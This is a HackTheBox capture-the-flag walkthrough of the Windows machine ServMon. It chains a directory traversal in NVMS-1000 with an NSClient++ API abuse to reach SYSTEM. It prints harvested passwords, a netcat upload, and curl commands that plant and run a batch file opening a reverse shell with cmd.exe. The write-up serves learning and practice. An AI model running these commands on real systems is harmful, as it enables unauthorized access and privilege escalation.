Hackthebox ServMon writeup

Basic Information

Type - Windows
User Blood - sampriti: 08 mins, 06 seconds.
Root Blood - sampriti: 34 mins, 10 seconds.

Steps involved

1 - Port Scanning
2 - Searching exploit for NVMS-1000
3 - Directory Traversal (using Burp, just a PoC)
4 - FTP enumeration
5 - Extracting passwords using Directory Traversal
6 - SSH login as Nadine (user.txt)
7 - Revising FTP and Nmap enumerations
8 - Checking the service on port 8443
9 - Local port forwarding through SSH
10 - Searching exploit for NSClient++
11 - Exploiting NSClient with the CLI
12 - Getting root.txt

Commands involved

1 - nmap -sC -sV -O -p- -v -oV
2 - ssh [email protected]
3 - cd c:\program files\nsclient++
4 - type nsclient.ini
5 - ssh -L 8443: [email protected] (local port forwarding)
6 - curl -s -k -u admin:ew2x6SsGTxjRwXOT -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/testing1.bat --data-binary "C:\Temp\nc64.exe 4444 -e cmd.exe"
7 - curl -s -k -u admin:ew2x6SsGTxjRwXOT https://localhost:8443/api/v1/queries/testing1/commands/execute?time=3m

Port Scan

nmap -sC -sV -O -p- -v -oV
-sV: probe open ports to determine service/version info
-sC: equivalent to --script=default
-O: enable OS detection
-p-: full port scan (all 65535 ports)
-v: verbose output
-oV: saving output to V
Nmap 7.70 scan initiated Mon Apr 13 04:55:26 2020 as: nmap -sC -sV -O -p- -v -oV
Increasing send delay for from 5 to 10 due to 11 out of 36 dropped probes since last increase.
Nmap scan report for
Host is up (0.27s latency).
Not shown: 65516 closed ports
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20 12:05PM Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
| 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp open http
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| Connection: close
| AuthInfo:
|   window.location.href = "Pages/login.htm";
| X11Probe:
| HTTP/1.1 408 Request Timeout
| Content-type: text/html
| Content-Length: 0
| Connection: close
|_ AuthInfo:
| http-favicon: Unknown favicon MD5: 3AEF8B29C4866F96A539730FAB53A88F
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5040/tcp open unknown
5666/tcp open tcpwrapped
6063/tcp open tcpwrapped
6699/tcp open napster?
7680/tcp open pando-pub?
8443/tcp open ssl/https-alt
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
| iday
|_ :Saturday
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2020-01-14T13:24:20
| Not valid after: 2021-01-13T13:24:20
| MD5: 1d03 0c40 5b7a 0f6d d8c8 78e3 cba7 38b4
|_SHA-1: 7083 bd82 b4b0 f9c0 cc9c 5019 2f9f 9291 4694 8334
|_ssl-date: TLS randomness does not represent time
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC

There are a lot of ports open.

FTP seems quite interesting, but we will visit it afterwards.

The first thing I always do is visit the website, so I did that.


Searching exploit for NVMS-1000

And we get to the NVMS-1000 login page.

So I looked for an exploit.

And got the exploit.

Directory Traversal (Using Burp, just a PoC)

So let's try this PoC (proof of concept) inside Burp.

I captured the GET request.


FTP enumeration

It looks like the PoC is working.

So now it is time to enumerate information about the directories.

Let's look at FTP.

 [email protected]:~/Desktop/htb/ServMon# ftp
Connected to
220 Microsoft FTP Service
Name ( anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 12:05PM
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 12:06PM Nadine
01-18-20 12:08PM Nathan
226 Transfer complete.
ftp> cd Nadine
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 12:08PM 174 Confidential.txt
226 Transfer complete.
ftp> cd ..
250 CWD command successful.
ftp> cd Nathan
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 12:10PM 186 Notes to do.txt
226 Transfer complete.

I was able to log in anonymously and found some .txt files, so I downloaded them with the get file_name command.

[email protected]:~/Desktop/htb/ServMon# cat Confidential.txt 
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.

This means that the passwords are on Nathan's Desktop.

[email protected]:~/Desktop/htb/ServMon# cat 'Notes to do.txt' 
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

Extracting passwords Using Directory Traversal

Let's leave it for a second and get that Passwords.txt file.

SSH login as Nadine (user.txt)

So now we have the passwords, so let's try logging in with them.

And I found that one of the passwords was for the user Nadine:

Nadine:[email protected]

Let's log in via SSH.


We can now read the user.txt

Revising FTP and Nmap enumerations

For privilege escalation, let's look at Notes to do.txt again.

It says "Lock down the NSClient Access".

This means NSClient is running on the machine. Moreover, Nmap also showed that port 8443 (HTTPS) is open, so maybe NSClient is running on that port.

So let's visit it.

Checking the service on port 8443

Local port forwarding through SSH

This means that it is running locally on the machine.

So let's do local port forwarding through SSH:

ssh -L 8443: [email protected]

And now visit the site.

Going into Advanced and allowing it got me to NSClient++.


Searching exploit for NSClient++

So let's search for exploits for it on Google.

And I found an exploit which can work.

Exploiting NSClient with the CLI

So I started following it.

cd c:\program files\nsclient++
type nsclient.ini

Here is the full file:

# If you want to fill this file with all available options run the following command:
#   nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:
#   nscp settings --activate-module --add-defaults
# For details run: nscp settings --help
; in flight - TODO
; Undocumented key
password = ew2x6SsGTxjRwXOT
; Undocumented key
allowed hosts =
; in flight - TODO
; Undocumented key
ssl options = no-sslv2,no-sslv3
; Undocumented key
verify mode = peer-cert
; Undocumented key
insecure = false
; in flight - TODO
; Undocumented key
CheckHelpers = disabled
; Undocumented key
CheckEventLog = disabled
; Undocumented key
CheckNSCP = disabled
; Undocumented key
CheckDisk = disabled
; Undocumented key
CheckSystem = disabled
; Undocumented key
WEBServer = enabled
; Undocumented key
NRPEServer = enabled
; CheckTaskSched - Check status of your scheduled jobs.
CheckTaskSched = enabled
; Scheduler - Use this to schedule check commands and jobs in conjunction with for instance passive monitoring through NSCA
Scheduler = enabled
; CheckExternalScripts - Module used to execute external scripts
CheckExternalScripts = enabled
; Script wrappings - A list of templates for defining script commands. Enter any command line here and they will be expanded by scripts placed under the wrapped scripts section. %SCRIPT% will be replaced by the actual script an %ARGS% will be replaced by any given arguments.
[/settings/external scripts/wrappings]
; Batch file - Command used for executing wrapped batch files
bat = scripts\%SCRIPT% %ARGS%
; Visual basic script - Command line used for wrapped vbs scripts
vbs = cscript.exe //T:30 //NoLogo scripts\lib\wrapper.vbs %SCRIPT% %ARGS%
; POWERSHELL WRAPPING - Command line used for executing wrapped ps1 (powershell) scripts
ps1 = cmd /c echo If (-Not (Test-Path "scripts\%SCRIPT%") ) { Write-Host "UNKNOWN: Script "%SCRIPT%" not found."; exit(3) }; scripts\%SCRIPT% $ARGS$
; exit($lastexitcode) | powershell.exe /noprofile -command -
; External scripts - A list of scripts available to run from the CheckExternalScripts module. Syntax is: command=script arguments
[/settings/external scripts/scripts]
; Schedules - Section for the Scheduler module.
; Undocumented key
foobar = command = foobar
; External script settings - General settings for the external scripts module (CheckExternalScripts).
[/settings/external scripts]
allow arguments = true

And got the password:

password = ew2x6SsGTxjRwXOT
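As an added defensive check (this script is not from the writeup and not part of NSClient++), the code below audits an nsclient.ini for the combination of settings this dump shows: an API password stored in plaintext, allowed hosts not restricted to loopback, and the web server together with CheckExternalScripts and allow arguments enabled, which is what lets an authenticated client create and run scripts. The sample ini is constructed from the values on the page; the allowed hosts value, missing from the page's copy, is assumed to be 127.0.0.1.

```python
# Added example (not from the writeup): audit nsclient.ini for the settings that let an authenticated web client create and run scripts.
# Constructed sample using the values shown in the writeup's dump; the
# allowed hosts value (missing from the page's copy) is assumed to be loopback.
SAMPLE_INI = """\
[/settings/default]
password = ew2x6SsGTxjRwXOT
allowed hosts = 127.0.0.1
[/modules]
WEBServer = enabled
CheckExternalScripts = enabled
[/settings/external scripts]
allow arguments = true
"""

def parse_ini(text):
    """Return {section: {key: value}}; keys before any [section] go under ''."""
    conf, section = {}, ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":          # blank or comment line
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip()
            continue
        key, sep, value = line.partition("=")
        if sep:
            conf.setdefault(section, {})[key.strip().lower()] = value.strip()
    return conf

def lookup(conf, key):
    """First value of key in any section (the page's dump lost most headers)."""
    for values in conf.values():
        if key in values:
            return values[key].lower()
    return None

def audit(text):
    """Return the list of findings; an empty list means nothing was flagged."""
    conf, findings = parse_ini(text), []
    if lookup(conf, "password"):
        findings.append("plaintext API password stored in nsclient.ini")
    hosts = [h.strip() for h in (lookup(conf, "allowed hosts") or "").split(",") if h.strip()]
    if not hosts or any(h not in ("127.0.0.1", "::1", "localhost") for h in hosts):
        findings.append("allowed hosts not limited to loopback")
    if (lookup(conf, "allow arguments") == "true"
            and lookup(conf, "checkexternalscripts") == "enabled"
            and lookup(conf, "webserver") == "enabled"):
        findings.append("web API can create and run external scripts with arguments")
    return findings
```

Run audit() over the real file; on a hardened host the script list should be empty, allow arguments false, and the password kept out of a world-readable ini.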

Now let's upload all the tools and scripts needed for the exploit to the Temp directory.

I used scp for that purpose:

scp nc.exe [email protected]:/Temp/nc.exe

Now, according to the exploit, we have to create a .bat file.

I did the further steps from the terminal only, as the website was down every time.

curl -s -k -u admin:ew2x6SsGTxjRwXOT -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/testing1.bat --data-binary "C:\Temp\nc64.exe 4444 -e cmd.exe"
curl -s -k -u admin:ew2x6SsGTxjRwXOT https://localhost:8443/api/v1/queries/testing1/commands/execute?time=3m
-s, --silent: silent mode
-k, --insecure: allow insecure server connections when using SSL
-u, --user: server user and password
-X, --request: specify request command to use

The path can be known through the API or the website. It's also something of hit and trial; moreover, I took help of Google to understand the directory structure.

And on the nc listener we must get a reverse shell.

Getting Root.txt

Let's read the root.txt:

C:\Users>cd Administrator
cd Administrator
C:\Users\Administrator>cd Desktop
cd Desktop
C:\Users\Administrator\Desktop>type root.txt
type root.txt
nt authority\system

Thanks for reading the writeup. If you liked it, please show your support.
